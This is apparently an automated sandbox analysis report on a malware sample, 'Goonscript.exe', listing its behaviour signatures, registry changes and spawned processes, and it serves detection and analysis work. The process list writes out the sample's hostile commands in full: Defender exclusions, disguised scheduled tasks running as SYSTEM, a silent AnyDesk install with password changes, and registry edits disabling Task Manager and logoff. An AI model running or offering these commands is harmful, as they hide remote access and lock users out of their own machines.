Analysis Overview
SHA256
d6abd828b52cf392d821adefecf01b16c08c1f2ac97fb7075c3f20d099c5a6d2
Threat Level: Known bad
The file Goonscript.exe was found to be: Known bad.
Malicious Activity Summary
PrivateLoader
Disables Task Manager via registry modification
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
Checks installed software on the system
Unsigned PE
Enumerates physical storage devices
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SetWindowsHookEx
Modifies Internet Explorer settings
Modifies registry key
Suspicious behavior: CmdExeWriteProcessMemorySpam
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Creates scheduled task(s)
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
Modifies registry class
Suspicious behavior: AddClipboardFormatListener
Delays execution with timeout.exe
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-09 18:38
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-09 18:38
Reported
2024-05-09 18:40
Platform
win7-20240221-en
Max time kernel
100s
Max time network
104s
Command Line
Signatures
PrivateLoader
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Disables Task Manager via registry modification
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation | C:\ProgramData\AnyDesk.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\doorbell-sys.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\locked.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Checks installed software on the system
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\ProgramData\AnyDesk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\ProgramData\AnyDesk.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "29" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DOMStorage\spankbang.com\ = "29" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "421441773" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (data omitted) | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DOMStorage\spankbang.com\NumberOfSubdomains = "1" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{51F21011-0E33-11EF-815A-6A55B5C6A64E} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "yes" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\AutoHide = "yes" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DOMStorage | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DOMStorage\spankbang.com\Total = "29" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DOMStorage\spankbang.com | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000071c834f68b8ed044a0afda50fbc58a7000000000020000000000106600000001000020000000aef56000a9325e635ee5c7e8ab4c6739444f10c78e634c943d4b9e8bc19e5b98000000000e80000000020000200000004f5f3782c5a6922c1ec25a277c5c47aab494fc2061c30aa83ebd25f89232ebb320000000473e7a5d71b0f005436c7b3087a5c00e1dd2d81c44e8393496e2daf2759d00944000000088328a5a81bca919e5377338580630649dbf650ee99cd8950041073e53a569791708c6e05ddd1a1ed4f60862221d8d75aff86771c12fa46673dbfbfb25dfc610 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a0cd931740a2da01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" \"%1\"" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" --play \"%1\"" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\ = "URL:AnyDesk Protocol" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\URL Protocol | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon\ = "\"C:\\ProgramData\\AnyDesk.exe\",0" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon\ = "AnyDesk.exe,0" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Goonscript.exe
"C:\Users\Admin\AppData\Local\Temp\Goonscript.exe"
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\20E9.tmp\20EA.tmp\20EB.vbs //Nologo
C:\Users\Admin\AppData\Roaming\doorbell-sys.exe
"C:\Users\Admin\AppData\Roaming\doorbell-sys.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\21D3.tmp\21D4.tmp\21D5.bat C:\Users\Admin\AppData\Roaming\doorbell-sys.exe"
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:/users/Admin/downloads/Anydesk.exe" --install "C:\ProgramData" --silent
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:\users\Admin\downloads\AnyDesk.exe" --local-service
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:\users\Admin\downloads\AnyDesk.exe" --local-control
C:\ProgramData\AnyDesk.exe
"C:\ProgramData\AnyDesk.exe" --service
C:\ProgramData\AnyDesk.exe
"C:\ProgramData\AnyDesk.exe" --control
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --remove-password
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://ctt.ac/Y6e79
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1064 CREDAT:275457 /prefetch:2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo DinaOwnsMe "
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --set-password
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/stn.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/svchost.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/conhost.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/Anydesk.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/stn.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/svchost.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/Anydesk.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/conhost.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/stn.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/svchost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/conhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\schtasks.exe
schtasks /Create /TN SystemTaskNavigator /TR "C:\ProgramData/stn.exe" /RL highest /SC ONLOGON /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN MicrosoftEdgeUpdateTaskList /TR "C:\ProgramData/Anydesk.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN OneDriveTaskReport /TR "C:\ProgramData/svchost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN MicrosoftUpdateScheduler /TR "C:\ProgramData/conhost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\timeout.exe
timeout /T 2 /NOBREAK
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --start
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Roaming\enc1.mp3"
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1064 CREDAT:537611 /prefetch:2
C:\Users\Admin\AppData\Roaming\locked.exe
"C:\Users\Admin\AppData\Roaming\locked.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4D65.tmp\4D66.tmp\4D67.bat C:\Users\Admin\AppData\Roaming\locked.exe"
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDown /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideHibernate /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideLock /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HidePowerButton /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
